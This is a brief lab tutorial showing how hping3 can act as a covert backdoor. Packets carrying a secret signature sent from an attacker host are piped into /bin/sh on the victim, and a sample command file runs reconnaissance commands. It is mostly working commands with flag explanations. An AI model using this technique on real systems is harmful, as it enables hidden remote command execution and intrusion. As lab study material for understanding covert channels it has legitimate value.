- Box A - victim, running a network service on port 8834. We'll reuse this
- Box B - attacker host behind NAT. Will transmit commands to the listener waiting on the victim.
This is similar to a reverse shell from box A to box B, except that B will need another way to view results of the commands executed on A.
A:
$ sudo hping3 --listen SecretSignature -I vboxnet0 -p 8834 | /bin/sh
--listen - Listen mode. Waits for packets containing the signature and dump the data from signature to the end of the packet
-I - Interface to listen on
-p - listening port
This will intercept packets and dump the content after a matching signature. Commands will be passed to the shell to be executed. Another trick would be needed to view the output of the commands though.
B:
$ sudo hping3 --count 1 --data 200 --file commands.txt --sign SecretSignature 192.168.56.1 -V -p 8834
--count 1 - stop after sending 1 packet
--data 200 - set packet body size in bytes
--file - fill packet with data from file
--sign - fill first a signature in the packet
-V - verbose
-p - destination port
$ cat commands.txt echo 123 > hacked.txt whoami > log.txt uname -a >> log.txt pwd >> log.txt ls -al >> log.txt ifconfig -a >> log.txt(New line at the end, to get the last command executed !)
Verify on victim's A machine that commands have been executed and results saved in the corresponding files.